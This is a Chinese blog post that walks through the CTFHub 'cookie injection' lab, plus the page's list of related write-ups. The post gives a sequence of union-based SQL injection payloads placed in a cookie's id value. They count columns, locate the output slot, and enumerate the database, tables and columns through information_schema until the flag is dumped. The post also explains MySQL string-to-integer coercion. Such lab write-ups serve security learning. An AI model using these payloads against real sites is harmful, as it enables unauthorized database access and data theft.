CTFHub-web(cookie注入)

已于 2022-04-28 16:04:44 修改
阅读量5.1k 收藏 6
点赞数
分类专栏: CTFHub 文章标签: web 安全
于 2022-04-11 19:37:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64444909/article/details/124078542
版权

文章目录

一、解题步骤

(1)题目为cookie注入,我们首先先看一下cookie里的值有没有什么可以帮助我们思考的东西,id=1,很明显存在sql注入
在这里插入图片描述(2)我们抓包来一步步的进行注入会更方便一些
我们用order by 语句来排序查询数据库有几行
(1,2都可以回显,直到3时无法回显,说明数据库有两行)

id=1 order by 3;

(3)接下来用联合查询语句union select语句来注入,从而判断显示位,同时也是判断注入点,可以看到位置2可以插入SQL语句。
(回显Data:2 注入成功)

 id=-1 union select 1,2

(4)接下来用union select database()来占2的位置进而来注入爆破数据库,获取当前数据库名称和相关信息

id=-1 union select 1,database();

回显Data:sqli,拿到当前数据库名
在这里插入图片描述在这里插入图片描述
(5)接下来获取数据库sqli的表名

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli';

在这里插入图片描述
(6)接下来获取数据表fcofekwtif中的字段名

id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='fcofekwtif';

在这里插入图片描述(7)接下来获取字段名mjdjlycgjw的值

id=-1 union select 1,group_concat(mjdjlycgjw) from fcofekwtif ;

在这里插入图片描述

二、关于sql中‘id=多少’的说明

这里很多刚入门的小伙伴会觉得为什么我的id要等于-1,这里我也只能给出我自己的解释,还希望大佬们多多指教

1.经过查阅资料得知,数据库中id的数据类型设置为int(数值类型)就会出现这种情况
如果数据库检查到id的参数并不为数值的话,就会发生类型转换(很简单粗暴的类型转换)
2.本题ID=1,我想注入的时候就不能再注ID=1了
(不然回显就一直是ctfhub)
3.用联合查询语句union select语句来注入,从而判断显示位,同时也是判断注入点,此时要先保证之前的数据查不出来才能判断注入位置,不然就会一直在注入当前的数据库,无法注入新的值来判断注入点,之后再union select id=-1数据不存在数据库中,可以看到位置2可以插入SQL语句。
在这里插入图片描述在这里插入图片描述

3.本题我把id等于字符串’-1’同样可以达到成功注入,因为会被转化为-1
在这里插入图片描述4.同样id=‘-1 and 1=1’也可以被识别为-1,成功注入
在这里插入图片描述5.id=’-1 and 1=2’也会被识别为-1,成功注入
在这里插入图片描述
6.以此类推,id只要不等于1,都可以注入成功
在这里插入图片描述总结一下:
比如字符串’1’会被转换为1

比如字符串’1"'会被转换为1

比如’1 and 1=1’会被识别为1

比如’1 and 1=2’会被识别为1

比如’1akbucbdadbaiudadbabdaud’会被识别为1

比如’23adasuasdai32ansoiha’会被识别为23

字符串中数字后面的字符可以是任意的,类型转换时都会被忽略,不会对数值有任何的影响
————————————————

小小大空翼
关注
专栏目录
cookie注入CTFHUB靶场)
weixin_54105551的博客
09-10 1410
因为是cookie注入,所以我们就把注意放在cookie上,发现cookie后面有一个id=1,我们加一个单引号,看看会不会报错。发现报错,存在注入,我们可以查看一下他的字段数,发现等于3的时候会报错,说明字段数等于二,然后我们可以开始暴库了。我们先用BP对靶场进行抓包,然后将抓到的数据发送到repeater。尝试一下用gagawesmtx这个表。得到数据库为sqli,然后开始爆表。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 868
CTFHUB SQL
CTFHub - Cookie注入
Have_a_great_day的博客
09-10 991
因为在CTFHubweb内SQL板块使用的是同一个数据库,所以列数是相同的。table_name='gzuhxxtsjy' :选择表名为【gzuhxxtsjy】的表的数据。table_schema=database() :选择当前连接的数据库(sqli)中的所有表。可以发现此处没有【flag】表,取而代之的是【gzuhxxtsjy】,查看该表中的列名。Cookie注入则是一种特定的SQL注入形式,它利用了应用程序中使用的Cookie来进行攻击。【news】表一直都存在,所以第一想法先不考虑此表中的内容。
CTFhub Cookie注入
plant1234的博客
06-18 764
Cookie注入: 首先更具题目启动环境得到: 发现这是cookie注入,于是就利用bp抓包得到: 发现cookie 能传参数,于是传入: 2 1’ 1 and 1=1 1’ and 1=1# 1 and 1=2 得到: 可以看到在1’ ,1’ and 1=1 ,1 and 1=2 出没有回显 在1 and 1=1 处得到正确回显 所以是存在注入的 于是用语句查看字段数: 看到有3报错,所以有两个字段 于是去得到当前库名: 在得到表名: ...
CTFHub技能树之WEBCookie注入
weixin_48799157的博客
03-20 1532
小白一个,如有错误请指正! 解法一:使用Burpsuite抓包 1.设置好Burpsuite后开始抓包 鼠标右键点击Send to Repeater 2.在Repeater界面发送数据包,发现可以看到返回的数据 3.可以发现Cookie的id可以传值,那我们通过Cookie进行注入 发现只有2个字段 有回显 有回显 没有回显 4.爆数据库 id=123 union select 1,database()# 5.爆表名 id=123 union select 1...
CTFHUB-Cookie注入
Web学习之路
03-28 244
cookie
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 843
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1271
CTFHUB-WEB-SQL注入
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7364
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 472
个人CTF学习之路
CTFHub | Cookie注入
尼泊罗河伯的博客
11-20 1888
根据网页显示内容提示,这题关于 Cookie 注入Cookie 注入和之前的注入手法一致,只不过需要在网页 Cookie 中修改其参数进行注入判断,那么直接打开工具 BurpSuite 对题目网站进行抓包。判断发现存在 Cookie 注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTFHubCookie注入
sGanYu
07-26 1904
手动注入 什么是cookie? 一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。当用户第一次访问页面的时候,服务器会生成一个用户特有的cookie,之后浏览器会根据用户设置的Cookie信息加载出内容,简单来说,cookie其实就是用户凭证的意思。 sqlmap注入 ...
sql注入预计完全体
最新发布
2303_81631620的博客
04-04 904
Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站。
CTFHUB-技能树-Web前置技能-Cookie
Static______的博客
03-26 624
跟踪:购物网站使用 Cookie 来跟踪用户以前查看过的商品,使网站能够向用户推荐他们可能喜欢的其他商品,并在用户继续在网站其他部分购物时保留购物车中的商品。Cookie 存储在您的设备本地,以释放网站服务器的存储空间。您可能会查看网站的某些项目或部分内容,Cookie 使用此数据帮助制作您可能喜欢的定向广告。会话管理:例如,Cookie 使网站能够识别用户并记住他们的个人登录信息和偏好,例如体育新闻与政治。域名下的Cookie 值一般来说是最大是 4KB,存储是以 Name=Value 的形式。
CTFHub-web(cookie)
分享与记录
03-11 1032
尝试使用burpsuite 分析cookie参数,发送到repeater之后将admin的值改为1 得到结果
学习记录 3 —— CTFHub Cookie
m0_56200845的博客
10-29 762
题目如上。 审题:Cookie欺骗、认证、伪造。这道题涉及到cookie的相关知识。 相关知识: Cookie简单来说就类似于现实生活中身份证这类东西,用于认证登录者的。 其产生原因与原理:HTTP 是无状态协议,它不对之前发生过的请求和响应的状态进行管理。也就是说, 无法根据之前的状态进行本次的请求处理。假设要求登录认证的 Web 页面本身无法进行状态的管理(不记录已登录的状态),那么每次跳转新页面不是要再次登录,就是要在每次请求报文中附加参数来管理登录状态。不可否认,无状态协议当然也有它的...
CTFHub | Cookie
尼泊罗河伯的博客
09-29 2624
根据题目描述内容,这是一道关于浏览器 Cookie 的问题。网页提示只有管理员才能获得flag,那么可以通过修改 Cookie 值,将 0(False) 改为 1(True) 获得此题 flag 。
CTFHUB之HTTP协议-cookie
keaidxxn的博客
04-19 454
点击cookie: 点击开启题目后,再在显示的页面里点击相关链接: 点击链接之后显示出以下网页信息: 因为这里提示只有admin可以拿到flag,并且这道题的名字为cookie,于是F12,查看相关信息: 在cookie里找到一个admin,发现它 的value值为0,于是把0改为1,并且刷新一下页面: 成功拿到flag了!!! ...
ctfhub sql注入cookie
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值